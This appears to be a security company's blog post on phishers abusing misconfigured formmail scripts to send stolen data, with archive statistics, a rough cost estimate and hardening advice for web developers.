The Cost of Open Formmail Scripts
Recently, some security colleagues posted a phishing URL that which was using formmail script to send victim data off to some email address. It’s a fairly common tactic, but actually rarer than the more common method of using a PHP script on the same server with the web pages to generate an email.
Why do the bad guys do it this way? Generally, because they’re using free web hosting to install phishing HTML pages, but the free hosting services does not support any server-side scripting like PHP (or .NET, CGI, etc.). All the phishers have to do is upload the HTML files and point them towards some other web site’s poorly configured formmail script. Voila! Insta-spoof!
So how often do phishers actually use a formmail script? PhishLabs set out to find out by reviewing the HTML source code of over 33,000 phish in our archives over the last 4 months. It turns out that after ignoring botnet hosted (e.g. fast-flux) phishing sites, that formmail phish represent roughly 4% of attacks.
Unfortunately, the biggest facilitators are not “mom-and-pop” web sites but in some instances well known companies. One of the world’s largest domain registrars has an ecommerce subsidiary that has an open formmailer program that is responsible for helping at least 200 phishers over the last few months. ISPs, web hosters, and universities are also complicit in helping phishers.
By “back of the napkin” estimates, if each phish attack costs banks (and consumers) $1000, then ill-configured formmail programs are costing us all roughly $3 million per year.
Dear web developers – if you’re going to use a formmail script, check referrers (even though they can be spoofed) and hard code the destination email address in the back-end script rather than allow it to be passed by the web client. This is a strong tactic for spear phishing protection.
The silver lining in this is that the phishers’ email addresses are usually exposed in the HTML of the phishing site when they use this tactic. PhishLabs has turned over a list of 513 email addresses to ISP and law enforcement cyber-crime investigators.